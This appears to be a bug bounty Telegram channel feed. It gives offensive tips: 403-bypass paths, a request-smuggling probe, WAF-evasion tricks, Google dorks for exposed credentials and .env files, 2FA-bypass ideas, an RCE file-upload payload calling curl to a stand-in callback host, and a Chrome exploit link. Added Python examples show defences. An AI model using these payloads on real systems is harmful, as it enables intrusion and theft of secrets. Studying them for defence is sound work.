Brut Security 2.0

Bringing you Bug Bounty Video POCs from top hunters around the globe!

4 514 subscribers
Channel posts
Repost from Brut Security
I am sharing 10 additional coupons on LinkedIn upon reaching 12,000 followers (60 remaining). 🎫📊 https://www.linkedin.com/posts/mandal-saumadip_cybersecurity-bugbounty-ethicalhacking-share-7479612184960909313-sG9F/ Please follow and like; the coupon will be available in the comments after reaching 12k followers. ⏱️💬 Thank you to everyone who participated today! 🙏

2
🔥 Just dropped — 2026 Bug Bounty Guide 📖
86 pages. 25 chapters. Built on real data.

What's inside:
→ The AI shift — what it means for your bounties
→ Full recon workflow (subfinder → puredns → httpx → nuclei)
→ Every major vuln class with payloads — XSS, SSRF, IDOR, SSTI, SQLi, LFI, XXE
→ LLM & AI attack surface — prompt injection, MCP, indirect injection
→ WAF bypass techniques for CloudFlare, Akamai, AWS
→ 9 real HackerOne reports — PayPal $18,900 · Dropbox $17,576 · GitLab $12K · HackerOne $20K
→ Full payload cheatsheet you'll actually use mid-hunt
→ A-to-Z methodology checklist
→ Cloud security — AWS SSRF, S3, IAM escalation
→ Mobile app testing (Android + iOS)
→ Career roadmap from first VDP to private programs

🔗 https://topmate.io/saumadip/2187710
— Saumadip | Brut Security @brutsecurity
270
3
🔥 Chrome RCE PoC: CVE-2026-6307 A working renderer RCE Proof of Concept for CVE-2026-6307 — a V8 type-confusion bug (JS-to-Wasm deoptimization) patched in Chrome 147.0.7727.101. ✅ Full primitives (addrof/fakeobj, out-of-cage, in-cage r/w) ✅ No-ASLR RCE that patches JIT code to pop xcalc ✅ Based on Nebula Security writeup ✅ Heavily improved with frontier LLMs + human direction (4-day experiment) This is renderer-only and still far from fully weaponized, but great for learning and research. 📥 PoC + scripts: https://github.com/0xsha/CVE-2026-6307 #Chrome #V8 #Exploit #CVE #SecurityResearch
502
4
💥TORLINK: A torrent finder that runs right from your terminal with zero setup and nothing to configure. One search checks a small curated list of sources at once. Pick what you want, and it downloads directly to your computer. GitHub: https://github.com/baairon/torlink
438
5
🔴 Another serious security vulnerability has been discovered in Redis 8.8.0, and no POC has been released yet for this bidirectional RCE found by v12sec.
2 277
6
🚨 Bug Bounty Tip: Password Reset Race Condition

Many applications generate a password reset token but fail to invalidate it when critical account details change. This can create a dangerous account takeover scenario.

Test Flow:
1️⃣ Request a password reset for your account.
2️⃣ Do not use the reset link yet.
3️⃣ Log in normally using your current password.
4️⃣ Change your email address (or another identifier linked to password recovery).
5️⃣ Now open the old password reset link you received before the email change.

💥 Potential Finding: If the old reset token still resets the password after the email change, the application isn't invalidating previously issued reset tokens. An attacker with access to an older reset email could still take over the account even after the user updates their recovery email.

What to Verify:
• Is the old token still valid after changing the email?
• Does the reset affect the current account owner?
• Are all existing reset tokens revoked after sensitive account changes?
• Does changing the password or email invalidate outstanding reset links?

🎯 Impact: High (Account Takeover) if an attacker can obtain or intercept an old password reset email.

Always test only on accounts you own or are explicitly authorized to assess.
652
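The server-side fix for the reset-token finding in the post above, as an added example that is not part of the original post: a token store that revokes every outstanding reset token when the email changes, with the post's test flow replayed against it. The class, function names, TTL and account values are assumptions made for this sketch.

```python
import hashlib
import secrets
import time

RESET_TTL = 15 * 60  # seconds; assumed token lifetime for this sketch


class ResetTokens:
    """In-memory reset-token store (hypothetical; a real app would use its database)."""

    def __init__(self):
        self._by_digest = {}  # sha256(token) -> (user_id, expires_at)

    @staticmethod
    def _digest(token):
        # Store only a hash so a leaked table does not yield usable reset links.
        return hashlib.sha256(token.encode()).hexdigest()

    def issue(self, user_id, now):
        token = secrets.token_urlsafe(32)
        self._by_digest[self._digest(token)] = (user_id, now + RESET_TTL)
        return token

    def revoke_all(self, user_id):
        stale = [d for d, (uid, _) in self._by_digest.items() if uid == user_id]
        for d in stale:
            del self._by_digest[d]

    def redeem(self, token, now):
        # pop() makes every token single-use, whether or not it is still valid.
        entry = self._by_digest.pop(self._digest(token), None)
        if entry is None or now > entry[1]:
            return None
        return entry[0]


def change_email(tokens, user, new_email, revoke_outstanding=True):
    user["email"] = new_email
    if revoke_outstanding:
        tokens.revoke_all(user["id"])  # the step the vulnerable flow is missing


def old_link_still_works(revoke_outstanding):
    """Replays the post's test flow; True means the finding is present."""
    tokens, now = ResetTokens(), time.time()
    user = {"id": 7, "email": "old@example.test"}   # constructed account
    old_token = tokens.issue(user["id"], now)       # steps 1-2: request, do not use
    change_email(tokens, user, "new@example.test", revoke_outstanding)  # steps 3-4
    return tokens.redeem(old_token, now + 60) == user["id"]             # step 5
```

The same `revoke_all` call belongs in the password-change handler, which covers the last item of the post's "What to Verify" list.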
7
Old Days...
844
8
🔥 BRUT SECURITY — DAILY PENTEST DROP 🔥

"403 Forbidden" doesn't always mean forbidden. Hit a locked admin panel? Don't walk away — try these path tricks first:

/admin → 403
/admin/. → 200 ✅
//admin// → 200 ✅
/./admin/./ → 200 ✅
/admin/.;/ → 200 ✅
/admin%20 → try it

Servers parse paths differently than WAFs filter them. That mismatch = your way in.

Bonus move:

GET /anything HTTP/1.1
Host: target.com
X-Original-URL: /admin

Some reverse proxies trust this header blindly. 200 OK where there should've been a wall.

⚠️ Always test on scope you're authorized for. This is recon, not a free pass.
💬 Drop a like if you've ever bypassed a 403 like this in the wild.
874
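How an access check can close the parser mismatch described in the post above, as an added example that is not part of the original post: the path is canonicalised before the rule is evaluated, and a path-override header is authorised like the request path. The protected prefix and function names are assumptions made for this sketch.

```python
from urllib.parse import unquote

PROTECTED_PREFIXES = ("/admin",)        # assumed ACL for this sketch
OVERRIDE_HEADERS = ("x-original-url",)  # header named in the post


def canonical_path(raw):
    """Collapse the variants a backend may resolve to the same resource."""
    path = unquote(raw.split("?", 1)[0])
    segments = []
    for seg in path.split("/"):
        seg = seg.split(";", 1)[0].strip()  # drop ;path-params and stray whitespace
        if seg in ("", "."):
            continue
        if seg == "..":
            if segments:
                segments.pop()
            continue
        segments.append(seg)
    return "/" + "/".join(segments)


def is_protected(raw):
    path = canonical_path(raw)
    return any(path == p or path.startswith(p + "/") for p in PROTECTED_PREFIXES)


def allow(request_path, headers, is_admin):
    """Authorise the request path and any override path the backend might honour."""
    candidates = [request_path]
    for name, value in headers.items():
        if name.lower() in OVERRIDE_HEADERS:
            candidates.append(value)
    return is_admin or not any(is_protected(c) for c in candidates)


# The path variants listed in the post, used here as regression inputs.
POST_VARIANTS = ["/admin", "/admin/.", "//admin//", "/./admin/./",
                 "/admin/.;/", "/admin%20"]


def denied_variants():
    return [v for v in POST_VARIANTS if not allow(v, {}, is_admin=False)]
```

Stripping `X-Original-URL` at the edge, so that only the proxy itself can set it, gives the same result without the backend having to evaluate it.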
9
☺️Your support keeps me motivated to share more valuable content! If you found this helpful, drop a like & send stars ⭐ to help me keep going. 💬 For queries, message me on Telegram: @wtf_brut 🎓 For course enrollment, reach out on WhatsApp: wa.link/brutsecurity
829
10
How to manually check for CL.TE Request Smuggling Vulnerabilities:

1️⃣ See if a GET request accepts POST
2️⃣ See if it accepts HTTP/1
3️⃣ Disable "Update Content-Length"
4️⃣ Send with CL & TE headers:

    POST / HTTP/1.1
    Host: <HOST-URL>
    Content-Length: 6
    Transfer-Encoding: chunked

    0

    G

5️⃣ Send request twice. If you receive a response like "Unrecognized method GPOST", you've just confirmed a CL.TE vulnerability!

Try this out for yourself in our CL.TE lab: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te
754
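Why the probe in the post above produces "GPOST", and the check a front end can apply to refuse such requests, as an added example that is not part of the original post. The capture is constructed, with example.test standing in for <HOST-URL>; the function names are assumptions made for this sketch.

```python
# Constructed capture of the probe from the post.
SAMPLE = (b"POST / HTTP/1.1\r\nHost: example.test\r\n"
          b"Content-Length: 6\r\nTransfer-Encoding: chunked\r\n\r\n"
          b"0\r\n\r\nG")


def split_request(raw):
    head, _, body = raw.partition(b"\r\n\r\n")
    headers = []
    for line in head.split(b"\r\n")[1:]:
        name, _, value = line.partition(b":")
        headers.append((name.strip().lower(), value.strip()))
    return headers, body


def framing_findings(raw):
    """Reasons a front end should reject the request instead of forwarding it."""
    headers, _ = split_request(raw)
    cl = [v for n, v in headers if n == b"content-length"]
    te = [v for n, v in headers if n == b"transfer-encoding"]
    findings = []
    if cl and te:
        findings.append("Content-Length and Transfer-Encoding both present")
    if len(set(cl)) > 1:
        findings.append("conflicting Content-Length values")
    if any(v.lower() != b"chunked" for v in te):
        findings.append("non-canonical Transfer-Encoding value")
    return findings


def bytes_left_for_next_request(raw):
    """Bytes a chunk-decoding back end leaves unread after the front end forwarded
    Content-Length bytes. Assumes the body carries no chunk trailers."""
    headers, body = split_request(raw)
    length = int(dict(headers)[b"content-length"])
    forwarded, pos = body[:length], 0
    while True:
        eol = forwarded.index(b"\r\n", pos)
        size = int(forwarded[pos:eol].split(b";")[0], 16)
        pos = eol + 2
        if size == 0:
            return forwarded[pos + 2:]  # skip the blank line that ends the body
        pos += size + 2
```

The leftover `G` is prepended to the next request on the same back-end connection, which is why the second send in step 5 is answered as method `GPOST`.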
11
🚨Nobody owes you a cybersecurity job in 2026. You've done 10 courses. You have zero projects. You're wondering why no one's calling back. The industry has 4.8M+ unfilled roles globally — and you're still unemployed. That's not bad luck. That's a bad strategy. In this article we break down exactly what's broken in how beginners are approaching cybersecurity careers right now — and the 7 steps that actually get you hired in 2026: ▶️ https://brutsecurity.medium.com/nobody-owes-you-a-cybersecurity-job-in-2026-heres-how-to-earn-one-anyway-a259005275a1 No fluff. No "just get certified." Just what actually works. 🎓 Want to build the skills this article talks about? Brut Practical Web Pentesting is open for enrollment — link in bio / website. #CyberSecurity #InfoSec #CareerAdvice #PenTesting #BrutSecurity
645
12
🚨 10 coupon codes available for the Brut Offensive Playbook V1 — full Web App Bug Bounty Methodology (59 pages, 20 chapters). 🥳First 10 people to reply "PLAYBOOK" get a code. Once they're claimed, offer's closed. ❤️ https://topmate.io/saumadip/2054509
891
13
🔥Google Dork - Exposed Configs 🔍 site:example[.]com ext:log | ext:txt | ext:conf | ext:cnf | ext:ini | ext:env | ext:sh | ext:bak | ext:backup | ext:swp | ext:old | ext:~ | ext:git | ext:svn | ext:htpasswd | ext:htaccess | ext:json ©TakSec
729
14
⚡Google Dorks - Cloud Storage:

site:http://s3.amazonaws.com "target[.]com"
site:http://blob.core.windows.net "target[.]com"
site:http://googleapis.com "target[.]com"
site:http://drive.google.com "target[.]com"

👉Find buckets and sensitive data.

Combine:
site:http://s3.amazonaws.com | site:http://blob.core.windows.net | site:http://googleapis.com | site:http://drive.google.com "target[.]com"

Add something to narrow the results: "confidential" "privileged" "not for public release"

✅Credit- Mike Takahashi
918
15
Hey Hunters, DarkShadow is here back again! 🖥 100 Web Vulnerabilities, categorized into various types: 😀

⚡ Injection Vulnerabilities:
1. SQL Injection (SQLi) 2. Cross-Site Scripting (XSS) 3. Cross-Site Request Forgery (CSRF) 4. Remote Code Execution (RCE) 5. Command Injection 6. XML Injection 7. LDAP Injection 8. XPath Injection 9. HTML Injection 10. Server-Side Includes (SSI) Injection 11. OS Command Injection 12. Blind SQL Injection 13. Server-Side Template Injection (SSTI)

⚡ Broken Authentication and Session Management:
14. Session Fixation 15. Brute Force Attack 16. Session Hijacking 17. Password Cracking 18. Weak Password Storage 19. Insecure Authentication 20. Cookie Theft 21. Credential Reuse

⚡ Sensitive Data Exposure:
22. Inadequate Encryption 23. Insecure Direct Object References (IDOR) 24. Data Leakage 25. Unencrypted Data Storage 26. Missing Security Headers 27. Insecure File Handling

⚡ Security Misconfiguration:
28. Default Passwords 29. Directory Listing 30. Unprotected API Endpoints 31. Open Ports and Services 32. Improper Access Controls 33. Information Disclosure 34. Unpatched Software 35. Misconfigured CORS 36. HTTP Security Headers Misconfiguration

⚡ XML-Related Vulnerabilities:
37. XML External Entity (XXE) Injection 38. XML Entity Expansion (XEE) 39. XML Bomb

⚡ Broken Access Control:
40. Inadequate Authorization 41. Privilege Escalation 42. Insecure Direct Object References 43. Forceful Browsing 44. Missing Function-Level Access Control

⚡ Insecure Deserialization:
45. Remote Code Execution via Deserialization 46. Data Tampering 47. Object Injection

⚡ API Security Issues:
48. Insecure API Endpoints 49. API Key Exposure 50. Lack of Rate Limiting 51. Inadequate Input Validation

⚡ Insecure Communication:
52. Man-in-the-Middle (MITM) Attack 53. Insufficient Transport Layer Security 54. Insecure SSL/TLS Configuration 55. Insecure Communication Protocols

⚡ Client-Side Vulnerabilities:
56. DOM-based XSS 57. Insecure Cross-Origin Communication 58. Browser Cache Poisoning 59. Clickjacking 60. HTML5 Security Issues

⚡ Denial of Service (DoS):
61. Distributed Denial of Service (DDoS) 62. Application Layer DoS 63. Resource Exhaustion 64. Slowloris Attack 65. XML Denial of Service

⚡ Other Web Vulnerabilities:
66. Server-Side Request Forgery (SSRF) 67. HTTP Parameter Pollution (HPP) 68. Insecure Redirects and Forwards 69. File Inclusion Vulnerabilities 70. Security Header Bypass 71. Clickjacking 72. Inadequate Session Timeout 73. Insufficient Logging and Monitoring 74. Business Logic Vulnerabilities 75. API Abuse

⚡ Mobile Web Vulnerabilities:
76. Insecure Data Storage on Mobile Devices 77. Insecure Data Transmission on Mobile Devices 78. Insecure Mobile API Endpoints 79. Mobile App Reverse Engineering

⚡ IoT Web Vulnerabilities:
80. Insecure IoT Device Management 81. Weak Authentication on IoT Devices 82. IoT Device Vulnerabilities

⚡ Web of Things (WoT) Vulnerabilities:
83. Unauthorized Access to Smart Homes 84. IoT Data Privacy Issues

⚡ Authentication Bypass:
85. Insecure "Remember Me" Functionality 86. CAPTCHA Bypass

⚡ Server-Side Request Forgery (SSRF):
87. Blind SSRF 88. Time-Based Blind SSRF

⚡ Content Spoofing:
89. MIME Sniffing 90. X-Content-Type-Options Bypass 91. Content Security Policy (CSP) Bypass

⚡ Business Logic Flaws:
92. Inconsistent Validation 93. Race Conditions 94. Order Processing Vulnerabilities 95. Price Manipulation 96. Account Enumeration 97. User-Based Flaws

⚡ Zero-Day Vulnerabilities:
98. Unknown Vulnerabilities 99. Unpatched Vulnerabilities 100. Day-Zero Exploits

Let me know if there is any vulnerability I missed?!
931
16
WAF Bypass Techniques + Tools

Here are some powerful tools and methods to help you bypass Web Application Firewalls during bug hunting:

### Tools:
- wafw00f — WAF fingerprinting tool → https://github.com/EnableSecurity/wafw00f
- bypass-firewalls-by-DNS-history — Discover origin IPs via old DNS records → https://github.com/vincentcox/bypass-firewalls-by-DNS-history
- CloudFail — Excellent for bypassing Cloudflare → https://github.com/m0rtem/CloudFail

### Effective Bypass Techniques:
1. Origin IP Discovery — Use historical DNS records (Censys, etc.) to find the real server IP and connect directly.
2. Dev/Staging Subdomains — These often don’t have WAF protection.
3. Case Variations — Try SeLeCt instead of SELECT
4. Comment Injection — SE//LECT
5. Multiple Encodings — URL → Double URL → Unicode, etc.
6. Parameter Pollution — ?id=1&id=2
7. HTTP Method Swap — Change from GET → POST → PUT
8. Content-Type Swap — Switch between form-data, JSON, XML
9. HTTP/2 Cleartext — Some WAFs only inspect HTTP/1.1

Quick WAF Detection Command:
curl -I https://target.com | grep -iE "server|cdn|cf-|x-"

Save this for your next bug bounty hunt! 🔥
#BugBounty #WAFBypass #BugBountyTips #Infosec
937
17
Useful Google Dorks that bug bounty hunters can leverage to find sensitive information: 👇🏻

1. Discovering Exposed Files:
   - intitle:"index of" "site:target.com"
   - filetype:log inurl:log site:target.com
   - filetype:sql inurl:sql site:target.com
   - filetype:env inurl:.env site:target.com

2. Finding Sensitive Directories:
   - inurl:/phpinfo.php site:target.com
   - inurl:/admin site:target.com
   - inurl:/backup site:target.com
   - inurl:wp- site:target.com

3. Exposed Configuration Files:
   - filetype:config inurl:config site:target.com
   - filetype:ini inurl:wp-config.php site:target.com
   - filetype:json inurl:credentials site:target.com

4. Discovering Usernames and Passwords:
   - intext:"password" filetype:log site:target.com
   - intext:"username" filetype:log site:target.com
   - filetype:sql "password" site:target.com

5. Finding Database Files:
   - filetype:sql inurl:db site:target.com
   - filetype:sql inurl:dump site:target.com
   - filetype:bak inurl:db site:target.com

6. Exposed Git Repositories:
   - inurl:".git" site:target.com
   - inurl:"/.git/config" site:target.com
   - intitle:"index of" ".git" site:target.com

7. Finding Publicly Exposed Emails:
   - intext:"email" site:target.com
   - inurl:"contact" intext:"@target.com" -www.target.com
   - filetype:xls inurl:"email" site:target.com

8. Discovering Vulnerable Web Servers:
   - intitle:"Apache2 Ubuntu Default Page: It works" site:target.com
   - intitle:"Index of /" "Apache Server" site:target.com
   - intitle:"Welcome to nginx" site:target.com

9. Finding API Keys:
   - filetype:env "DB_PASSWORD" site:target.com
   - intext:"api_key" filetype:env site:target.com
   - intext:"AWS_ACCESS_KEY_ID" filetype:env site:target.com

10. Exposed Backup Files:
   - filetype:bak inurl:backup site:target.com
   - filetype:bak inurl:backup site:target.com
   - filetype:zip inurl:backup site:target.com
   - filetype:tgz inurl:backup site:target.com

Replace target.com with the domain or target you are focusing on.

#GoogleDorks #BugHunting #OSINT
968
18
📌Bug Bounty Tip: Finding Confidential Documents Fast ✅Admins often leave these unredacted files online by mistake, making them a high-medium severity finding for bug bounty programs.
1 190
19
🔥 Bug Bounty Tip: Simple Auth Bypass = Easy Wins

Many devs focus on fancy front-end protections while leaving the backend wide open. Quick checks that pay off:

1. Direct Admin Access
   Try /admin, /dashboard, /panel, /cp without logging in. Often no redirect or proper auth check.

2. 2FA Bypass
   - Skip the 2FA step by modifying the request (remove 2fa param or set to true).
   - Replay the login request after the first successful step.
   - Try ?bypass=1 or similar hidden params.

3. Password Reset Token Leak
   Check if the reset token appears in the JSON response, page source, or confirmation email before the user clicks the link.

Pro tip: These "dumb" bugs are way more common than complex exploits and often lead to critical severity + good bounties. Test them early in every program.
1 115
20
Hey Hunters, DarkShadow is here back again!

File upload extension bypass for RCE ❌
Metadata injection for RCE ✅

A file upload vulnerability is not just bypassing the extension; metadata can be exploited. You can try like:

{"Title\n-if\nsystem('curl burplink)||1\n-Comment":"x"}

Guys, if you really love to read then show your love and react ❤️ and don't forget to follow me x.com/darkshadow2bd

#bugbounty #bugbountytips #rce
1 366